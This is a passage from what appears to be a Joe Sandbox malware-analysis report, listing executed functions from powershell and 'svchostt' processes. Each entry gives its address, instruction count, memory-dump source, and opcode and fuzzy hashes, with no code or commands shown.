                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2396657061.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: 75cc591d56b865421418cb4d1dbd5b20a6320eafc3c2957c2b4834ee9d9d0646
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: B1E01A31B0C8188FDA78DB4CE0529A973E1EB9832171601BBD14EC7572CA22ED518BC0

                                                                            Executed Functions

                                                                            Function 00007FFD9B7F16E9 Relevance: .8, Instructions: 796COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f924a405af92be8e5709a6d31c7b02c3f18a8fa7cb0db50e90d7f2890069db4
                                                                            • Instruction ID: 3b7e8d52035a865facaaff9009e4df03f664ac44caeb4b15fb07ce9aae3c76f4
                                                                            • Opcode Fuzzy Hash: 1f924a405af92be8e5709a6d31c7b02c3f18a8fa7cb0db50e90d7f2890069db4
                                                                            • Instruction Fuzzy Hash: 0132C970B19A4D4FE798EB6884B9ABD77D2FF98340F550579E04EC32E6DD28A8018781
                                                                            Function 00007FFD9B7F0E5E Relevance: .3, Instructions: 278COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 910ea634af849349febf1e7e07a70ee8efb813eb77723d51fa4f88e4e9763e50
                                                                            • Instruction ID: 199e71df241817233f1bfdb9f87fa25a036cb13d7eb18d49ec02cad5c995b531
                                                                            • Opcode Fuzzy Hash: 910ea634af849349febf1e7e07a70ee8efb813eb77723d51fa4f88e4e9763e50
                                                                            • Instruction Fuzzy Hash: 83712B12B0D6D90EE356B77C68299F93BE1DF8622970982F7D0DDCA1E7DC0818438396
                                                                            Function 00007FFD9B7F20C5 Relevance: .2, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a75a1d54c330f6c31a237b54362924fc1f9507340e485ec48b8ca10bf19a5cd0
                                                                            • Instruction ID: 1cfb3f91b10fa3c023f040994dd1847a328bd1ca25c0ffda9b9a8ca0d89103db
                                                                            • Opcode Fuzzy Hash: a75a1d54c330f6c31a237b54362924fc1f9507340e485ec48b8ca10bf19a5cd0
                                                                            • Instruction Fuzzy Hash: 4C510E10B1E6C94FD79AABB848746A57FE4DF87219B0801FBE09DC71E7DD181806C386
                                                                            Function 00007FFD9B7F07F2 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;M_$<M_^
                                                                            • API String ID: 0-3421805066
                                                                            • Opcode ID: cde1483e5537087166a5b1d1df3e17ae891a100627263b206f6be75ca2cf9c27
                                                                            • Instruction ID: bde27495e127f5e84787106b8672d2c3c60d8488556774e357447523fb01c60b
                                                                            • Opcode Fuzzy Hash: cde1483e5537087166a5b1d1df3e17ae891a100627263b206f6be75ca2cf9c27
                                                                            • Instruction Fuzzy Hash: 0041F636B0AADA4BD304EF68E0E59E97BB0FF80214B6545FAD05AC73D7CD3865428741
                                                                            Function 00007FFD9B7F12FA Relevance: .5, Instructions: 451COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9650ddf7534c1dd03486307b5a546237cc80b06996cfedc532189618330e1775
                                                                            • Instruction ID: df594cce1709eccfc43e493fa05d5fbe3c45ff39c758b554b43fda09678c5467
                                                                            • Opcode Fuzzy Hash: 9650ddf7534c1dd03486307b5a546237cc80b06996cfedc532189618330e1775
                                                                            • Instruction Fuzzy Hash: 0E31D532F0AA8E4ED754EBA8D8A55EC7BB1EF95210F4503BBC05AD62F3DD2428018780
                                                                            Function 00007FFD9B7F12CF Relevance: .4, Instructions: 450COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bdebae16c66b6812148a7467127c9ce3e9d04fb6ca1189bd764c05099326bd28
                                                                            • Instruction ID: d8a64ad5b9ac31fc2844f09a422abc94174bfd7f91f07a583ecfa35f7f70395f
                                                                            • Opcode Fuzzy Hash: bdebae16c66b6812148a7467127c9ce3e9d04fb6ca1189bd764c05099326bd28
                                                                            • Instruction Fuzzy Hash: 9F31D532F0AA8E4ED7549B68D8A55EC7FB1EF95210F4603BBC05AE62F2DD2429058790
                                                                            Function 00007FFD9B7F1320 Relevance: .4, Instructions: 433COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0614f062e9e594596749753112b19c78524b8697f4fcb1c29ee83388cb8ee939
                                                                            • Instruction ID: b913808fc8cb4a6d6a285c899d28121d008fbbd1cbeb6128e51d83b8f6f362c0
                                                                            • Opcode Fuzzy Hash: 0614f062e9e594596749753112b19c78524b8697f4fcb1c29ee83388cb8ee939
                                                                            • Instruction Fuzzy Hash: 4A31D232F09A8E4FD7509B68D8A55ECBFB1EF95200F4603FAC05AE72F2CD2429018390
                                                                            Function 00007FFD9B7F0AFA Relevance: .2, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd3532b490429b753ba2a08b304e6d8324a23601b57c0bde7f0d796bef2a446b
                                                                            • Instruction ID: 6d194832d71af8d1f75e0d8245173178dcf73525b08b4cea8103dd655176baa9
                                                                            • Opcode Fuzzy Hash: dd3532b490429b753ba2a08b304e6d8324a23601b57c0bde7f0d796bef2a446b
                                                                            • Instruction Fuzzy Hash: 4851E436F09A5E8BDB04FBACE8A59EC77B1FF94326B11427AD009C72D6CE3564418784
                                                                            Function 00007FFD9B7F0B6F Relevance: .2, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21a5585cc40959fedfcf3cac2063e8996b25d762b35d7cf51247a0bd5970fba2
                                                                            • Instruction ID: f96e71269735210189542f5217ada12a51b06367acd3fac5bae43280a87dbbfe
                                                                            • Opcode Fuzzy Hash: 21a5585cc40959fedfcf3cac2063e8996b25d762b35d7cf51247a0bd5970fba2
                                                                            • Instruction Fuzzy Hash: D041F236B0995E9FDB44FFA8D8A5AED77A1FF94311B50427AD009C3386CE35A442C780
                                                                            Function 00007FFD9B7F0638 Relevance: .1, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 805dbf1d4a6943bf213714a41c0bdc47c37802f112594f85c9768c01742d3b27
                                                                            • Instruction ID: 08985f000482d2ed93d6b7e27927407bb6b109f5233512ced5e0f6c12251fd00
                                                                            • Opcode Fuzzy Hash: 805dbf1d4a6943bf213714a41c0bdc47c37802f112594f85c9768c01742d3b27
                                                                            • Instruction Fuzzy Hash: 6031C221B1C94D0FE798EF6C9469679B6C2EF98315F4506BAB05EC32E7DD24AC028385
                                                                            Function 00007FFD9B7F0D48 Relevance: .1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1d50564a1ed714cacf22c875535ee2856635066a4947ede5204723befe87beb5
                                                                            • Instruction ID: 77d2ede63b7cd33388aa37dcfc056eaff875032d052a270f61904429ed568d56
                                                                            • Opcode Fuzzy Hash: 1d50564a1ed714cacf22c875535ee2856635066a4947ede5204723befe87beb5
                                                                            • Instruction Fuzzy Hash: 8C214211F1490A4BEB94BFBC546E7BC72D2EF98715F5042B6E51DC32DADD28A8414382
                                                                            Function 00007FFD9B7F086D Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6a29a87f8ff0ad6679b0211d9206ab4cab77db901efa5356c6f1277f0066d15
                                                                            • Instruction ID: 71a0216201ea6a5756aad443f412e6c578779532438b45772bbdac8411b1a03e
                                                                            • Opcode Fuzzy Hash: f6a29a87f8ff0ad6679b0211d9206ab4cab77db901efa5356c6f1277f0066d15
                                                                            • Instruction Fuzzy Hash: D9218234759DCE4FD744EF68E0E49EDBFB1BFC8200BA548A4E41A8378ACE3869018751
                                                                            Function 00007FFD9B7F2291 Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2459360909.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7f0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89a1dc8e3b20b7e9fdc38119b73cc7d7b2736c41257ffbd63536bfb27e9b2311
                                                                            • Instruction ID: 18120f1deb08da5f1b687ebe371baa403be3395dfe6a9d406ed462da1322dcb7
                                                                            • Opcode Fuzzy Hash: 89a1dc8e3b20b7e9fdc38119b73cc7d7b2736c41257ffbd63536bfb27e9b2311
                                                                            • Instruction Fuzzy Hash: 70014714F0EBD90FE3A1A67818654317FE0CFD1221B4A06BBF888C61B7D8086B4083C6

                                                                            Executed Functions

                                                                            Function 00007FFD9B7D16E9 Relevance: .8, Instructions: 796COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7951d17d8ac50a5bddb32a1bb9ffd57ed7bc35f92ee841aa15b3f011a0f0adab
                                                                            • Instruction ID: ff8f8fc57f779d4408cf25819ccc2d1fdfa27a51a4e140b0e4a95d68fbe13b9e
                                                                            • Opcode Fuzzy Hash: 7951d17d8ac50a5bddb32a1bb9ffd57ed7bc35f92ee841aa15b3f011a0f0adab
                                                                            • Instruction Fuzzy Hash: 3732C560B19A4D4FE798EB6C8479ABD77D2EFD8340F45067DE00DC32E6DE28A9058741
                                                                            Function 00007FFD9B7D0E5E Relevance: .3, Instructions: 283COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 474d44ae4fe72cfd4f0cc13484f0dd45eca9a839beb513c79c09056891f90a3e
                                                                            • Instruction ID: fd8286ba7d38969a6019b7dd296682edc60088bd601e8e3a6b9fa2a69605ef85
                                                                            • Opcode Fuzzy Hash: 474d44ae4fe72cfd4f0cc13484f0dd45eca9a839beb513c79c09056891f90a3e
                                                                            • Instruction Fuzzy Hash: 31711716F0D6DA0EE356B67C64695F92BA1DFC622971981FBD0CDCA0E7CC0868878352
                                                                            Function 00007FFD9B7D20C5 Relevance: .2, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b65e50efc0b2e0c2ba83c53793b6578c9aa52f7d91d636e17ffd7d3ff8cf53cc
                                                                            • Instruction ID: d41ec95aa587a935c8d1caffb2a083d65b9df94eb810f632b82e213a082c875a
                                                                            • Opcode Fuzzy Hash: b65e50efc0b2e0c2ba83c53793b6578c9aa52f7d91d636e17ffd7d3ff8cf53cc
                                                                            • Instruction Fuzzy Hash: 44510010B1E6C94FD796ABB848746757FE4DF87219B0906FBE09DC61E7DD18180AC342
                                                                            Function 00007FFD9B7D07F2 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;O_$<O_^
                                                                            • API String ID: 0-3431308889
                                                                            • Opcode ID: 33dee44e41990dc1a664688d8dd60dfd7a853c7b1ad907422cd8a60e502ca2fb
                                                                            • Instruction ID: 09d712221bd9bdcb1dc2bc8c9a3eac6e24611e4e6cd09d95b64d996e67d3bf96
                                                                            • Opcode Fuzzy Hash: 33dee44e41990dc1a664688d8dd60dfd7a853c7b1ad907422cd8a60e502ca2fb
                                                                            • Instruction Fuzzy Hash: 8641D636B0964D4BD305EB6CF4A59E97B60EFC4214B5945FED018CB3EBCD286846C750
                                                                            Function 00007FFD9B7D12FB Relevance: .5, Instructions: 452COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 119f445414fa9e4ecee776525fce4fcf63438a50d33f1d7a4b8e7f15c12717cb
                                                                            • Instruction ID: 07e0e4d78f9fb68bd8b69cd0aeaa22f120ea067958ea90278bbbc94d1ad380f9
                                                                            • Opcode Fuzzy Hash: 119f445414fa9e4ecee776525fce4fcf63438a50d33f1d7a4b8e7f15c12717cb
                                                                            • Instruction Fuzzy Hash: 9831FF72F09A4E4ED750AB6C98B55ED7BB1EFC4250F4602BAC04DEA1B6DD24280A8350
                                                                            Function 00007FFD9B7D12CF Relevance: .4, Instructions: 450COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 800f3b72ef4277b7b845c4338d77a57c8e624836e273015604af16c25a5a0678
                                                                            • Instruction ID: 99d218b0eb3c34985a9a7eb5bef15e3e49c0a4aa5543457649a7a2b04c246645
                                                                            • Opcode Fuzzy Hash: 800f3b72ef4277b7b845c4338d77a57c8e624836e273015604af16c25a5a0678
                                                                            • Instruction Fuzzy Hash: D8310072F09A4E4ED750AB68D8B55ED7BB1FFC4250F4A02BAC04DE61B6DD242909C350
                                                                            Function 00007FFD9B7D1320 Relevance: .4, Instructions: 433COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed9e6764b8fc74e71852ea7a2092b2a94f99037e90a10b0055126ece93d7e409
                                                                            • Instruction ID: db21983ff38c6ed4da386fde5f964e091b535a93fd90825206952669fc7a3d60
                                                                            • Opcode Fuzzy Hash: ed9e6764b8fc74e71852ea7a2092b2a94f99037e90a10b0055126ece93d7e409
                                                                            • Instruction Fuzzy Hash: 1E31D072E09A4E4FD750AB68D8B55EDBBB1EFC5240F8602BAC04DE71F6DD2429098350
                                                                            Function 00007FFD9B7D0AFB Relevance: .2, Instructions: 207COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8087a8d007f0f20aeec79f13c658800e3a516d6c9480288e00cdf2e629403575
                                                                            • Instruction ID: 902af06af849e9a9032dd17d40738a5ad064803d65a9ab42333ad8913262d1ef
                                                                            • Opcode Fuzzy Hash: 8087a8d007f0f20aeec79f13c658800e3a516d6c9480288e00cdf2e629403575
                                                                            • Instruction Fuzzy Hash: 5B51E536F0861A8BDB04FBACA465AEC33B1FFD432AB15467AD009C72D6CE246445C790
                                                                            Function 00007FFD9B7D0B6F Relevance: .2, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bb7dcc1e27aa572d4d1e5a56145fe34b7c035deb0965450f0a3b412b9ef549b
                                                                            • Instruction ID: 87076d3acc9ed790eea896252351fc066a08ddd2020f520e3c5895e24c9ce6b3
                                                                            • Opcode Fuzzy Hash: 0bb7dcc1e27aa572d4d1e5a56145fe34b7c035deb0965450f0a3b412b9ef549b
                                                                            • Instruction Fuzzy Hash: 9B411036B08A1E8FDB44FB6CD861AEC73A1FFC4311B45467AD009C7296CE34A84AC780
                                                                            Function 00007FFD9B7D0638 Relevance: .1, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 558e025687bf6614864de53a9bd02f4df5fb0e5a8ff6ab3ee4e2fc63548934e1
                                                                            • Instruction ID: 300cbf0ee4b6b58d8dd3712041d5a949813b93e750ee20c97c6bb338b205c5ee
                                                                            • Opcode Fuzzy Hash: 558e025687bf6614864de53a9bd02f4df5fb0e5a8ff6ab3ee4e2fc63548934e1
                                                                            • Instruction Fuzzy Hash: E431D121B1C94D0FE798EF6C9869679B2C2EFD8355F0546BEA05EC32E7DD24AC428341
                                                                            Function 00007FFD9B7D0D48 Relevance: .1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                                                            • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
                                                                            Function 00007FFD9B7D086D Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8663974db51a767834c702e707c10f5130f27934a34752d0c0a588452369aa53
                                                                            • Instruction ID: 26d2ed1c255a5ea5967386a7341a1f93882bcc7a463aa3e31f4c99df83c3114d
                                                                            • Opcode Fuzzy Hash: 8663974db51a767834c702e707c10f5130f27934a34752d0c0a588452369aa53
                                                                            • Instruction Fuzzy Hash: AF217E34758A4D4BC345EB6CE4A69FDBBA1BFC8200B8649ACE408C73AECE2859058751
                                                                            Function 00007FFD9B7D2291 Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2c88ef00f56f55f08cc7067d2c1f5fbdeb7fc49e09e1e840959e457bafd26e1b
                                                                            • Instruction ID: b49bc745d51a2d925789d07fb012106a9df6acc9eada1541bfb9af69526c6958
                                                                            • Opcode Fuzzy Hash: 2c88ef00f56f55f08cc7067d2c1f5fbdeb7fc49e09e1e840959e457bafd26e1b
                                                                            • Instruction Fuzzy Hash: 89014C14E0D7890FE35166785C754317FE0DFD1251B0A07BBF888C60F7D8086B498392

                                                                            Executed Functions

                                                                            Function 00007FFD9B7D16E9 Relevance: .8, Instructions: 796COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8299cc959fd2e7285e98e23ce157690ff38f76ed8c0216a6d73a51495a860b5
                                                                            • Instruction ID: 83557b9dc0011f7de4248cf4f6a1e8fb2be7d93c141d51718a5e23a226b5f5f4
                                                                            • Opcode Fuzzy Hash: a8299cc959fd2e7285e98e23ce157690ff38f76ed8c0216a6d73a51495a860b5
                                                                            • Instruction Fuzzy Hash: 4932C760B19A4D4FE798EB688479ABDB7D2FFD8340F450679E04DC32E6DE28B9018741
                                                                            Function 00007FFD9B7D0E5E Relevance: .3, Instructions: 283COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f115f5c7800d6ffce1aa3e7ee4e12fda4fd11bf0c03fe2cd359c7348ff6ab425
                                                                            • Instruction ID: 18c665c9a166ddae5611fb1d80c9a447cad1aa0d605be4b2443e888ef90b0e1e
                                                                            • Opcode Fuzzy Hash: f115f5c7800d6ffce1aa3e7ee4e12fda4fd11bf0c03fe2cd359c7348ff6ab425
                                                                            • Instruction Fuzzy Hash: 4A711616F0D6DA0EE356B67C64695E93BA1DFC622971981FBD0CDCA0E7CC0828878352
                                                                            Function 00007FFD9B7D20C5 Relevance: .2, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
